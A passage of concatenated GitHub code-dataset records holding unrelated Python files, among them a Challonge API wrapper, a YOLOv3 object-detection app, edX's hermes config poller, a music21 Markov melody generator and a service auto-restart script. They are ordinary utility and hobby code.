data['rr_pts_for_game_tie'] = rr_pts_for_game_tie\n\n if pts_for_bye is not None:\n if not (isinstance(pts_for_bye, int) or isinstance(pts_for_bye, float)):\n raise BadArgument('Parameter `pts_for_bye` must be of type int or float')\n else:\n pts_for_bye = round(float(pts_for_bye), 1)\n data['pts_for_bye'] = pts_for_bye\n\n if swiss_rounds is not None:\n if not isinstance(swiss_rounds, int):\n raise BadArgument('Parameter `swiss_rounds` must be of type int')\n else:\n data['swiss_rounds'] = swiss_rounds\n\n if ranked_by is not None:\n if not isinstance(ranked_by, TournamentRankedBy):\n try:\n ranked_by = TournamentRankedBy(ranked_by)\n except:\n raise BadArgument(f\"Parameter `ranked_by` is invalid, valid Types: {', '.join(['`{}`'.format(i.value) for i in list(TournamentRankedBy)])}\")\n else:\n data['ranked_by'] = ranked_by\n else:\n data['ranked_by'] = ranked_by\n\n if accept_attachments is not None:\n if not isinstance(accept_attachments, bool):\n raise BadArgument('Parameter `accept_attachments` must be of type bool')\n else:\n data['accept_attachments'] = accept_attachments\n\n if hide_forum is not None:\n if not isinstance(hide_forum, bool):\n raise BadArgument('Parameter `hide_forum` must be of type bool')\n else:\n data['hide_forum'] = hide_forum\n\n if show_rounds is not None:\n if not isinstance(show_rounds, bool):\n raise BadArgument('Parameter `show_rounds` must be of type bool')\n else:\n data['show_rounds'] = show_rounds\n\n if private is not None:\n if not isinstance(private, bool):\n raise BadArgument('Parameter `private` must be of type bool')\n else:\n data['private'] = private\n\n if notify_users_when_matches_open is not None:\n if not 
isinstance(notify_users_when_matches_open, bool):\n raise BadArgument('Parameter `notify_users_when_matches_open` must be of type bool')\n else:\n data['notify_users_when_matches_open'] = notify_users_when_matches_open\n\n if notify_users_when_the_tournament_ends is not None:\n if not isinstance(notify_users_when_the_tournament_ends, bool):\n raise BadArgument('Parameter `notify_users_when_the_tournament_ends` must be of type bool')\n else:\n data['notify_users_when_the_tournament_ends'] = notify_users_when_the_tournament_ends\n\n if sequential_pairings is not None:\n if not isinstance(sequential_pairings, bool):\n raise BadArgument('Parameter `sequential_pairings` must be of type bool')\n else:\n data['sequential_pairings'] = sequential_pairings\n\n if signup_cap is not None:\n if isinstance(signup_cap, int):\n raise BadArgument('Parameter `signup_cap` must be of type int')\n elif signup_cap > 256 or signup_cap < 1:\n raise BadArgument('Parameter `signup_cap` must be between the values 1 and 256')\n else:\n data['signup_cap'] = signup_cap\n\n if check_in_duration is not None:\n if not isinstance(check_in_duration, int):\n raise BadArgument('Parameter `check_in_duration` must be of type int')\n else:\n data['check_in_duration'] = check_in_duration\n\n if grand_finals_modifier is not None:\n if not isinstance(grand_finals_modifier, TournamentGrandFinalModifier):\n try:\n grand_finals_modifier = TournamentGrandFinalModifier(grand_finals_modifier)\n except:\n raise BadArgument(f\"Parameter `grand_finals_modifier` is invalid, valid Types: {', '.join(['`{}`'.format(i.value) for i in list(TournamentGrandFinalModifier)])}\")\n else:\n data['grand_finals_modifier'] = grand_finals_modifier\n else:\n data['grand_finals_modifier'] = grand_finals_modifier\n\n\n url_params = '?' 
+ urlencode(_prepare_params(data, 'tournament'))\n\n req = requests.post(req_url + url_params, auth = self.auth_info)\n if not req.status_code == 200:\n try:\n errors = req.json()\n raise HTTPException(f\"{req.status_code} - {errors['errors'][0]}\")\n except:\n raise HTTPException(req.status_code)\n else:\n return Tournament(req.json(), self.base_link, self.auth_info)\n\n# An ovararching Challonge account object.\nclass Challonge:\n def __init__(self, username, api_key):\n self.auth_info = (username, api_key)\n self.base_link = BASE_LINK\n self.tournaments = Tournaments(self.auth_info)\n","repo_name":"Aryathel/ChallongePY","sub_path":"challonge.py","file_name":"challonge.py","file_ext":"py","file_size_in_byte":15405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"18174771688","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun May 16 18:02:05 2021\r\n\r\n@author: udayd\r\n\"\"\"\r\n\r\nimport streamlit as st\r\nimport cv2\r\nimport numpy as np\r\nimport time\r\nimport matplotlib.pyplot as plt\r\nfrom PIL import Image\r\n\r\n\r\ndef detect_objects(our_image):\r\n st.set_option('deprecation.showPyplotGlobalUse', False)\r\n\r\n col1, col2 = st.beta_columns(2)\r\n\r\n col1.subheader(\"Original Image\")\r\n st.text(\"\")\r\n plt.figure(figsize = (15,15))\r\n plt.imshow(our_image)\r\n col1.pyplot(use_column_width=True)\r\n \r\n net = cv2.dnn.readNet(\"model_final.weights\", \"yolov3.cfg\")\r\n\r\n classes = []\r\n with open(\"label.names\", \"r\") as f:\r\n classes = [line.strip() for line in f.readlines()]\r\n layer_names = net.getLayerNames()\r\n output_layers = [layer_names[i[0]-1] for i in net.getUnconnectedOutLayers()]\r\n\r\n colors = np.random.uniform(0,255,size=(len(classes), 3)) \r\n\r\n new_img = np.array(our_image.convert('RGB'))\r\n img = cv2.cvtColor(new_img,1)\r\n height,width,channels = img.shape\r\n\r\n\r\n blob = cv2.dnn.blobFromImage(img, 0.00392, (416,416), (0,0,0), True, crop = False) #(image, scalefactor, size, mean(mean subtraction from each layer), swapRB(Blue to red), crop)\r\n\r\n net.setInput(blob)\r\n start = time.time()\r\n outs = net.forward(output_layers)\r\n end = time.time()\r\n\r\n class_ids = []\r\n confidences = []\r\n boxes =[]\r\n\r\n for out in outs:\r\n for detection in out:\r\n scores = detection[5:]\r\n class_id = np.argmax(scores) \r\n confidence = scores[class_id] \r\n if confidence > 0.5: \r\n \r\n center_x = int(detection[0] * width)\r\n center_y = int(detection[1] * height)\r\n w = int(detection[2] * width) \r\n h = int(detection[3] * height) \r\n\r\n #box coordinates\r\n x = int(center_x - w /2) \r\n y = int(center_y - h/2) \r\n boxes.append([x,y,w,h])\r\n confidences.append(float(confidence))\r\n class_ids.append(class_id)\r\n\r\n score_threshold = st.sidebar.slider(\"Confidence Threshold\", 0.00,1.00,0.5,0.01)\r\n nms_threshold = st.sidebar.slider(\"NMS Threshold\", 0.00, 1.00, 0.4, 0.01)\r\n\r\n indexes = cv2.dnn.NMSBoxes(boxes, confidences,score_threshold,nms_threshold) \r\n print(indexes)\r\n\r\n font = cv2.FONT_HERSHEY_SIMPLEX\r\n items = []\r\n for i in range(len(boxes)):\r\n if i in indexes:\r\n x,y,w,h = boxes[i]\r\n label = str.upper((classes[class_ids[i]])) \r\n color = colors[i]\r\n cv2.rectangle(img,(x,y),(x+w,y+h),color,3) \r\n text = \"{}: {:.4f}\".format(label, confidences[i])\r\n cv2.putText(img, text, (x,y), cv2.FONT_HERSHEY_SIMPLEX, 0.9, color, 3)\r\n items.append(label)\r\n\r\n\r\n st.text(\"\")\r\n col2.subheader(\"Object-Detected Image\")\r\n 
st.text(\"\")\r\n plt.figure(figsize = (15,15))\r\n plt.imshow(img)\r\n col2.pyplot(use_column_width=True)\r\n\r\n if len(indexes)>1:\r\n st.success(\"Found {} Objects - {}\".format(len(indexes),[item for item in set(items)]))\r\n st.success(\"[INFO] Time {:.6f} seconds\".format(end - start))\r\n else:\r\n st.success(\"Found {} Object - {}\".format(len(indexes),[item for item in set(items)]))\r\n st.success(\"[INFO] Time {:.6f} seconds\".format(end - start))\r\n\r\n\r\ndef object_main():\r\n\r\n st.title(\"WatchThatBot !!!\")\r\n st.markdown(\"# :camera:\")\r\n choice = st.radio(\"\", (\"Show Demo\", \"Browse an Image\"))\r\n st.write()\r\n\r\n if choice == \"Browse an Image\":\r\n st.set_option('deprecation.showfileUploaderEncoding', False)\r\n image_file = st.file_uploader(\"Upload Image\", type=['jpg','png','jpeg'])\r\n\r\n if image_file is not None:\r\n our_image = Image.open(image_file) \r\n detect_objects(our_image)\r\n\r\n elif choice == \"Show Demo\":\r\n our_image = Image.open(\"image.jpg\")\r\n detect_objects(our_image)\r\n\r\nif __name__ == '__main__':\r\n object_main()","repo_name":"udaydikshit/Data_Science","sub_path":"vehicle_detection_with_yolov3_application.py","file_name":"vehicle_detection_with_yolov3_application.py","file_ext":"py","file_size_in_byte":4012,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"25620498079","text":"\"\"\"Model Class and Test Report Generation Function\"\"\"\n\n__author__ = \"Victor Mawusi Ayi\"\n\nimport matplotlib.image as mpimg\nfrom cv2 import resize\nfrom features import (\n contrast,\n lightness,\n luminance,\n supracontrast,\n supralightness,\n supraluminance\n)\n\nfeaturizers = {\n \"contrast\":contrast,\n \"lightness\":lightness,\n \"luminance\":luminance,\n \"supracontrast\":supracontrast,\n \"supralightness\":supralightness,\n \"supraluminance\":supraluminance\n}\n\nclass Model:\n\n def __init__(\n self,\n classifier,\n classes,\n imagesize,\n features=list(featurizers.keys()),\n accuracy=0,\n istrained=False\n ):\n self.classifier = classifier\n self.features = features\n self.classes = classes\n self.imagesize=imagesize\n self.accuracy = 0\n self.istrained = istrained\n\n def train(self, trainset):\n features, labels = trainset\n self.classifier.fit(features[self.features], labels)\n self.istrained = True\n \n def test(self, testset):\n \n if self.istrained == False:\n raise ValueError(\"Model is not trained yet\")\n\n features, labels = testset\n predictions = self.classifier.predict(\n features[self.features]\n )\n \n report = testreport(labels, predictions, (0, 1))\n self.accuracy = report[0]\n \n return report\n \n def predict(self, rgb_image):\n \n if self.istrained == False:\n raise ValueError(\"Model is not trained yet\")\n\n featurevector=[]\n image = resize(rgb_image, self.imagesize)\n \n for feature in self.features:\n featurizer = featurizers.get(feature)\n featurevector.append(\n featurizer(rgb_image)\n )\n \n prediction = self.classifier.predict([featurevector])\n prediction = self.classes[prediction[0]]\n \n return prediction\n\n\n\ndef testreport(\n actual_labels,\n predictions,\n classes_\n):\n exp_label_count = {x:0 for x in classes_}\n pred_label_count = {x:0 for x in classes_}\n tdatasize = 0\n truepossize = 0\n falsepos = []\n\n for i in range(len(predictions)):\n \n m, n = actual_labels[i], predictions[i]\n if m==n:\n pred_label_count[m] += 1\n truepossize += 1\n else:\n falsepos.append(i)\n \n tdatasize += 1\n exp_label_count[m] += 1\n\n preds = []\n 
for key in pred_label_count:\n p_count = pred_label_count[key]\n e_count = exp_label_count[key]\n\n preds.append(\n \"Class {}: {}/{} --> {}%\".format(\n key,\n p_count, \n e_count,\n round((p_count/e_count)*100, 2)\n )\n )\n \n accuracy = round((truepossize/tdatasize) * 100, 2)\n preds = \"\".join([\n \"Overall Accuracy -> {}%\\n\\n\".format(accuracy),\n \"Class Accuracies:\\n\",\n \"\\n\".join(preds)\n ])\n \n return preds, tuple(falsepos)\n","repo_name":"ayivima/day_night_image_analysis","sub_path":"modelling.py","file_name":"modelling.py","file_ext":"py","file_size_in_byte":3069,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"24264625105","text":"#! /usr/bin/env python3\n\nimport sys\nimport subprocess\nimport click\nimport time\nimport requests\nimport yaml\nimport logging\nimport boto3\nimport backoff\nimport random\nfrom itertools import zip_longest\nimport asym_crypto_yaml\nfrom enum import Enum\n\nclass Protocol(Enum):\n https = 1\n s3 = 2\n\nvalid_protocols = []\nfor protocol in Protocol:\n valid_protocols.append(protocol)\n\n# ./hermes --interval 30\n# --filename index.html --url https://edx.org/index.html --command /edx/bin/supervisorctl restart lms \n# --filename index2.html --url https://edx.org/index2.html --command /edx/bin/supervisorctl restart cms \n# --filename index3.html --url https://edx.org/index3.html --command /edx/bin/supervisorctl restart discovery \n\n@click.command()\n@click.option('--debug/--no-debug', default=False)\n@click.option('--filename', '-f', type=str, help='filename to write to', multiple=True)\n@click.option('--url', '-u', type=str, help='url to read from', multiple=True)\n@click.option('--command', '-c', type=str, help='command to run', multiple=True)\n@click.option('--interval', '-i', type=int, help='frequency to poll all configured files, in seconds', default=40)\n@click.option('--jitter', '-j', type=int, help='each sleep will randomly add between 0 and j seconds', default=40)\n@click.option('--yamlfile', '-y', type=click.Path())\n@click.option('--secret-key-files', '-k', type=str, help='secret keys for decrypting downloaded yaml file', multiple=True)\ndef watch_config(filename, url, command, interval, jitter, debug, yamlfile, secret_key_files):\n logging.basicConfig(\n format='%(asctime)s %(levelname)-8s %(message)s',\n level=logging.DEBUG if debug else logging.INFO,\n datefmt='%Y-%m-%d %H:%M:%S')\n try:\n if yamlfile:\n with open(yamlfile) as yamlhandle:\n service_config = yaml.safe_load(yamlhandle)\n # If no keys were passed, dont fail, just dont decrypt\n # This is so hermes can function with no keys being passed.\n for block in service_config:\n if 'secret_key_files' not in block:\n block['secret_key_files'] = None\n elif len(filename) == len(url) and len(filename) == len(command):\n service_config = []\n for filename_item, url_item, command_item, secret_key_files_item in zip_longest(filename, url, command, secret_key_files):\n block = {'filename': filename_item, 'url': url_item, 'command': command_item, 'secret_key_files': secret_key_files_item}\n service_config.append(block)\n else:\n raise Exception('ERROR parsing config')\n\n except Exception as err:\n raise Exception('ERROR parsing config: %s\\n' % (str(err))) \n seconds = 0\n file_timestamps = {}\n while True:\n for config_file in service_config:\n filename_item = config_file['filename']\n url_item = config_file['url']\n command_item = config_file['command']\n secret_key_files_item = config_file['secret_key_files']\n assert 
filename_item != None\n assert url_item != None\n assert command_item != None\n\n protocol = get_valid_protocol_from_url(url_item)\n\n if protocol == Protocol.https and config_age_changed_https(filename_item, url_item, file_timestamps):\n download_config_https(filename_item, url_item, file_timestamps, secret_key_files_item)\n run_command_for_filename(filename_item, command_item)\n elif protocol == Protocol.s3 and config_age_changed_s3(filename_item, url_item, file_timestamps):\n download_config_s3(filename_item, url_item, file_timestamps, secret_key_files_item)\n run_command_for_filename(filename_item, command_item)\n elif protocol in valid_protocols:\n # Dont do anything - this is a valid protocol, that does not need to be updated, this is\n # correct behaviour\n logging.debug(\"No update needed.\")\n else:\n # I dont know how to compare timestamps and/or download files of this protocol\n logging.error('ERROR: unimplemented protocol %s\\n' % protocol)\n\n if interval == 0:\n break\n sleep_time = interval + random.randint(0, jitter)\n logging.debug('DEBUG: sleeping %d seconds\\n' % sleep_time)\n time.sleep(sleep_time)\n seconds = seconds + sleep_time\n logging.debug('DEBUG: woke up after %d seconds\\n' % seconds)\n\ndef run_command_for_filename(filename_item, command_item):\n logging.info('file \\'%s\\' changed, running: \\'%s\\'' % (filename_item, command_item))\n try:\n logging.info(subprocess.check_output(command_item, shell=True).decode(\"utf-8\"))\n except subprocess.CalledProcessError as err:\n logging.error(f\"Command '{err.cmd}' returned non-zero exit status {err.returncode}: {err.output.decode('utf-8')}\")\n\ndef get_valid_protocol_from_url(url):\n if url.startswith(\"https://\"):\n return Protocol.https\n elif url.startswith(\"s3://\"):\n return Protocol.s3\n else:\n raise Exception('ERROR Unsupported Protocol')\n\n\ndef config_age_changed_https(filename, url, file_timestamps):\n\n if file_timestamps.get(filename) == None:\n return True\n\n try:\n url_head = requests.head(url, timeout=2)\n except requests.exceptions.RequestException as err:\n logging.error('ERROR checking %s: %s\\n' % (str(url), str(err)))\n # If we can't head the file, log an error and continue\n return False\n if url_head.headers['Last-Modified'] != file_timestamps.get(filename):\n logging.debug('DEBUG: changed %s Server modified: %s Local modified: %s\\n' % (url, url_head.headers['Last-Modified'], file_timestamps[filename]))\n return True\n else:\n logging.debug('DEBUG: Unchanged %s\\n' % url)\n return False\n\ndef download_config_https(filename, url, file_timestamps, secret_key_files):\n try:\n url_get = requests.get(url, timeout=2)\n except requests.exceptions.RequestException as err:\n logging.error('ERROR downloading %s: %s\\n' % (str(url), str(err)))\n return False\n try:\n last_modified = url_get.headers['Last-Modified']\n encrypted_filename = filename + \".enc\"\n filehandle = open(encrypted_filename, \"w\")\n filehandle.write(str(url_get.content)) \n filehandle.close()\n decrypt_and_write_to_file(encrypted_filename, filename, secret_key_files)\n file_timestamps[filename] = last_modified\n except IOError as err:\n logging.error('ERROR writing %s: %s\\n' % (str(filename), str(err)))\n return False\n logging.info('Downloaded %s\\n' % url)\n return True\n\ndef config_age_changed_s3(filename, url, file_timestamps):\n if file_timestamps.get(filename) == None:\n return True\n\n client = boto3.client('s3')\n\n # URl is expected to be something like: s3://my-bucket-name/my-path/to/my/object\n\n bucket_and_key = 
extract_bucket_key_from_s3_url(url)\n bucket = bucket_and_key['bucket']\n key = bucket_and_key['key']\n\n try:\n head=client.head_object(Bucket=bucket, Key=key)\n except Exception as err:\n logging.error('ERROR checking %s: %s\\n' % (str(url), str(err)))\n # If we can't head the file, log an error and continue\n return False\n\n if head['LastModified'] != file_timestamps.get(filename):\n logging.debug('DEBUG: changed %s Server modified: %s Local modified: %s\\n' % (url, head['LastModified'], file_timestamps[filename]))\n return True\n else:\n logging.debug('DEBUG: Unchanged %s\\n' % url)\n return False\n\ndef download_config_s3(filename, url, file_timestamps, secret_key_files):\n client = boto3.client('s3')\n\n bucket_and_key = extract_bucket_key_from_s3_url(url)\n bucket = bucket_and_key['bucket']\n key = bucket_and_key['key']\n last_modified = client.head_object(Bucket=bucket, Key=key)['LastModified']\n\n try:\n encrypted_filename = filename + \".enc\"\n with open(encrypted_filename, 'wb') as data:\n client.download_fileobj(bucket, key, data)\n decrypt_and_write_to_file(encrypted_filename, filename, secret_key_files)\n file_timestamps[filename] = last_modified\n\n except IOError as err:\n logging.error('ERROR writing %s: %s\\n' % (str(filename), str(err)))\n return False\n except Exception as err:\n logging.error('ERROR downloading %s: %s\\n' % (str(url), str(err)))\n return False\n \n logging.info('Downloaded %s\\n' % url)\n return True\n\ndef extract_bucket_key_from_s3_url(url):\n # strip protocol\n bucket_and_key = url.split(\"//\")[1]\n\n # Split out bucket and key\n bucket_and_key = bucket_and_key.split(\"/\", 1)\n\n bucket = bucket_and_key[0]\n key = bucket_and_key[1]\n return {'key': key, 'bucket': bucket}\n\ndef decrypt_and_write_to_file(encrypted_filename, decrypted_output_filename, secret_key_files):\n decrypted_dict = None\n with open(encrypted_filename, \"r\") as f:\n if secret_key_files:\n secret_keys = secret_key_files.split(',')\n for secret_key in secret_keys:\n try:\n decrypted_dict = asym_crypto_yaml.load(f, secret_key)\n break\n except Exception as err:\n logging.warning('Secret key is invalid %s: %s\\n' % (str(secret_key), str(err)))\n f.seek(0)\n else:\n logging.error('ERROR decrypting File %s:' % (str(encrypted_filename)))\n decrypted_dict = asym_crypto_yaml.load(f, None)\n else:\n decrypted_dict = asym_crypto_yaml.load(f, secret_key_files)\n asym_crypto_yaml.write_dict_to_yaml(decrypted_dict, decrypted_output_filename)\n\nif __name__ == '__main__':\n watch_config()\n","repo_name":"edx/hermes","sub_path":"hermes.py","file_name":"hermes.py","file_ext":"py","file_size_in_byte":9880,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"10428343724","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport modelcluster.fields\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('productions', '0011_auto_20160314_2010'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='ProductionPageJuicerSource',\n fields=[\n ('id', models.AutoField(primary_key=True, verbose_name='ID', auto_created=True, serialize=False)),\n ('source_name', models.CharField(max_length=100, help_text='Juicer source account name, without # or @. 
Filters across all account types in the feed.', verbose_name='source account name')),\n ('page', modelcluster.fields.ParentalKey(to='productions.ProductionPage', related_name='juicer_sources')),\n ],\n options={\n 'abstract': False,\n },\n ),\n ]\n","repo_name":"ghostwords/localore","sub_path":"localore/productions/migrations/0012_productionpagejuicersource.py","file_name":"0012_productionpagejuicersource.py","file_ext":"py","file_size_in_byte":922,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"76"} +{"seq_id":"15846899562","text":"from numpy.random import choice\nimport music21 as mu\n\n#song = mu.converter.parse('/Users/gene/Music/MIDI/chopin-Fantaisie-Impromptu-op66.mid')\nsong = mu.corpus.parse('bwv66.6')\n\nnotes = 16 # Change me\n\ntransition = {}\n\nprev = None\nlast = None\ntotal = 0\n\n# Gather the transitions\nfor n in song.flat.notes:\n if type(n) == mu.note.Note:\n if prev:\n if last:\n key = (prev.name, last.name)\n if key in transition:\n if n.name in transition[key]:\n transition[key][n.name] += 1\n else:\n transition[key][n.name] = 1\n else:\n transition[key] = {n.name: 1}\n prev = last\n total += 1\n last = n\n else:\n prev = n\n\n#print(transition)\n\n# Compute the probability for each transition\nfor k,v in transition.items():\n for i,j in v.items():\n transition[k][i] = j / total\n\n#print(transition)\n\n# Create a score based on the transition probabilities\nscore = mu.stream.Stream()\n\nkey = list(transition.keys())[0]\n#print('key:', key)\n\nn = mu.note.Note(key[0])\nscore.append(n)\nn = mu.note.Note(key[1])\nscore.append(n)\n\nkeys = [' '.join(i) for i in list(transition.keys())]\n\n# Append a note or a rest to the score\nfor _ in range(notes - 2):\n if key in transition:\n draw = choice(list(transition[key].keys()), 1, list(transition[key].values()))\n\n n = mu.note.Note(draw[0])\n score.append(n)\n\n key = (key[1], draw[0])\n else:\n r = mu.note.Rest()\n score.append(r)\n\n draw = choice(keys)\n key = tuple(draw.split())\n\n #print('key:', key)\n\nscore.show()\nscore.show('midi')\n","repo_name":"ology/Music","sub_path":"transition.py","file_name":"transition.py","file_ext":"py","file_size_in_byte":1732,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"76"} +{"seq_id":"27832237600","text":"from keras.callbacks import ModelCheckpoint\nfrom keras.utils.visualize_util import plot\nfrom kutilities.callbacks import MetricsCallback, WeightsCallback, PlottingCallback\nfrom sklearn.metrics import accuracy_score\n\nfrom dataset.Semeval_Task6_data_loader import SemEval2017Task6\nfrom models.task6A_models import humor_RNN\nfrom utilities.data_loader import Task6Loader, prepare_dataset, get_embeddings\nfrom utilities.ignore_warnings import set_ignores\n\nset_ignores()\nimport numpy\nimport pickle\n\nnumpy.random.seed(1337) # for reproducibility\ntext_length = 50\nTASK = \"1\" # Select the Subtask (1 or 2)\n\n# specify the word vectors file to use.\n# for example, WC_CORPUS = \"own.twitter\" and WC_DIM = 300,\n# correspond to the file \"datastories.twitter.300d.txt\"\nWV_CORPUS = \"datastories.twitter\"\nWV_DIM = 300\n\n# Flag that sets the training mode.\n# - if FINAL == False, then the dataset will be split in {train, val, test}\n# - if FINAL == True, then the dataset will be split in {train, val}.\n# Even for training the model for the final submission a small percentage\n# of the labeled data will be kept for as a validation set for early stopping\nFINAL = True\n\n# If True, the 
SemEval gold labels will be used as the testing set in order to perform Post-mortem analysis\nSEMEVAL_GOLD = False\n\n############################################################################\n# PERSISTENCE\n############################################################################\n# if True save model checkpoints, as well as the corresponding word indices\n# you HAVE tp set PERSIST = True, in order to be able to use the trained model later\nPERSIST = False\nbest_model = lambda: \"cp_model_task6_sub{}.hdf5\".format(TASK)\nbest_model_word_indices = lambda: \"cp_model_task6_sub{}_word_indices.pickle\".format(TASK)\n\n############################################################################\n# LOAD DATA\n############################################################################\nembeddings, word_indices = get_embeddings(corpus=WV_CORPUS, dim=WV_DIM)\n\nif PERSIST:\n pickle.dump(word_indices, )\n\nloader = Task6Loader(word_indices, text_lengths=(text_length, text_length), subtask=TASK, y_one_hot=False,\n own_vectors=WV_CORPUS.startswith(\"own\"))\n\nif FINAL:\n print(\"\\n > running in FINAL mode!\\n\")\n training, testing = loader.load_final()\nelse:\n training, validation, testing = loader.load_train_val_test()\n\nif SEMEVAL_GOLD:\n print(\"\\n > running in Post-Mortem mode!\\n\")\n gold_data = SemEval2017Task6().get_gold_data_task_1()\n gold_data = [v for k, v in sorted(gold_data.items())]\n X = [x for hashtag in gold_data for x in hashtag[0]]\n y = [x for hashtag in gold_data for x in hashtag[1]]\n gold = prepare_dataset(X, y, loader.pipeline, loader.y_one_hot, y_as_is=loader.subtask == \"2\")\n\n validation = testing\n testing = gold\n FINAL = False\n\nprint(\"Building NN Model...\")\nnn_model = humor_RNN(embeddings, text_length)\n# nn_model = humor_CNN(embeddings, text_length)\n# nn_model = humor_FFNN(embeddings, text_length)\nplot(nn_model, show_layer_names=True, show_shapes=True, to_file=\"model_task6_sub{}.png\".format(TASK))\nprint(nn_model.summary())\n\n############################################################################\n# CALLBACKS\n############################################################################\nmetrics = {\n \"acc\": (lambda y_test, y_pred: accuracy_score(y_test, y_pred)),\n}\n\n_callbacks = []\n\n_datasets = {}\n_datasets[\"1-train\"] = (training[0], training[1])\n_datasets[\"2-val\"] = (validation[0], validation[1]) if not FINAL else (testing[0], testing[1])\nif not FINAL:\n _datasets[\"3-test\"] = (testing[0], testing[1]) if not FINAL else None\n\nmetrics_callback = MetricsCallback(datasets=_datasets, metrics=metrics)\n\n_callbacks.append(metrics_callback)\n_callbacks.append(PlottingCallback(grid_ranges=(0.5, 1.), height=4))\n_callbacks.append(WeightsCallback(parameters=[\"W\"], stats=[\"raster\", \"max\", \"mean\", \"std\"]))\n\nif PERSIST:\n checkpointer = ModelCheckpoint(filepath=best_model(), monitor='val.acc', mode=\"max\", verbose=1, save_best_only=True)\n _callbacks.append(checkpointer)\n\nhistory = nn_model.fit(training[0], training[1],\n validation_data=(validation[0], validation[1]) if not FINAL else (testing[0], testing[1]),\n nb_epoch=15, batch_size=256,\n verbose=1,\n callbacks=_callbacks)\n\npickle.dump(history.history, open(\"hist.pickle\", \"wb\"))\n","repo_name":"cbaziotis/datastories-semeval2017-task6","sub_path":"models/task6A.py","file_name":"task6A.py","file_ext":"py","file_size_in_byte":4475,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"76"} 
+{"seq_id":"3512458627","text":"import numpy as np\nimport cv2\n\nface_cascade = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')\n\ncap = cv2.VideoCapture(0)\nframe_id = 0\n\nwhile True:\n _, frame = cap.read()\n frame_id += 1\n (H, W) = frame.shape[:2]\n\n faces = face_cascade.detectMultiScale(frame, 1.3, 5)\n for (x, y, w, h) in faces:\n frame = cv2.rectangle(frame, (x, y), (x+w, y+h), (255, 0, 0), 2)\n roi = frame[y:y+h, x:x+w]\n\n cv2.imshow(\"Image\", frame)\n\n key = cv2.waitKey(1)\n if key == 27:\n break\n\n\ncap.release()\ncv2.destroyAllWindows()","repo_name":"Neihtq/face-recognition-lock","sub_path":"haar_face_detection.py","file_name":"haar_face_detection.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"26767481868","text":"from django.urls import path\nfrom django.views.generic import TemplateView\n\nfrom . import views\n\napp_name = 'books'\n\nurlpatterns = [\n\tpath('', views.BookList.as_view(), name='list'),\n path('upload/', views.UploadBook.as_view(), name='upload'),\n path('/delete/', views.DeleteBook.as_view(), name='delete'),\n path('/download/', views.download_book, name='download'),\n path('/read/', views.read_book, name='read'),\n path('pdf/viewer.html/', views.view_book, name='view-book'),\n]\n","repo_name":"shoukreytom/pdfstack","sub_path":"books/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":517,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"33676582709","text":"##Installing Tkinter\nfrom tkinter import *\n\n##What Happens When You Mine Gold\ndef mined():\n lbl.configure(text=\"You have mined gold!\")\n\n\n##Window Settings\nwindow = Tk()\nwindow.title(\"Gold Miner\")\nwindow.state('zoomed')\n\n##The 'Mine Gold' Button\nbtn = Button(window, text=\"Mine Gold\", command=mined)\nbtn.grid(column=0, row=0)\n\n##The Text\nlbl = Label(window, text=\"You have not mined gold.\")\nlbl.grid(column=1, row=0)\n\n##The Window\nwindow.mainloop()\n\n##NOTES\n##This app was made as a joke but I continue to update anyways. 
Anyone can use the code above.","repo_name":"4444dogs/GoldMiner","sub_path":"goldminer.py","file_name":"goldminer.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"12857386822","text":"class Seminar2_hw3:\n def main(self):\n a = 90\n b = 3\n if b != 0:\n print(a/b)\n\n self.printSum(23, 234)\n abc = [1, 2]\n if 3 < len(abc):\n abc[3] = 9\n\n def printSum(self, a, b):\n print(a + b)\n\nseminar = Seminar2_hw3()\nseminar.main()","repo_name":"NikNEZH/Exceptions","sub_path":"HW2/w3.py","file_name":"w3.py","file_ext":"py","file_size_in_byte":304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"9697209794","text":"#!/usr/bin/env python3\n\n\"\"\"\n * @author Shadoworker5 Dev\n * @email shadoworker5@protonmail.com\n * @create date 2023-06-16 12:28:04\n * @modify date 2023-07-10 15:10:10\n\"\"\"\nimport os\nimport subprocess\nfrom requests import post as postQuery\nfrom datetime import datetime\n\n# To use this script you must follow this guide\n## Copy this script in /etc/init.d/\n## Define schedule job in crontab example */5 * * * * root /etc/init.d/services_auto_start.py\n## uncomment sendNotificationToSlack or sendNotificationToDiscord about your\n\nLOG_FILE_PATH = \"/tmp/services_auto_start.log\"\nSLACK_BOT_URL = \"https://hooks.slack.com/services/XXXXXXXXX/XXXXXXXXX/XXXXXXXXXXXXXXXXXX\"\nDISCORD_WEBHOOKS = \"https://discordapp.com/api/webhooks/XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX\"\n\n# Define dictionnary for all service to monitor\nCHECK_SERVICES = {\n \"ssh\" : {\n \"port\" : 22,\n \"command\" : \"service ssh start\"\n },\n \"apache2\" : {\n \"port\" : 80,\n \"command\" : \"service apache2 start\"\n },\n \"openvpn\" : {\n \"port\" : 1194,\n \"command\" : \"service openvpn start\"\n },\n \"mysql\" : {\n \"port\" : 3306,\n \"command\" : \"service mysql start\"\n }\n}\n\ndef executeCommande(command):\n os.system(command)\n\ndef getCurrentTime():\n return datetime.now()\n\ndef writeInLogFile(msg):\n with open(LOG_FILE_PATH, 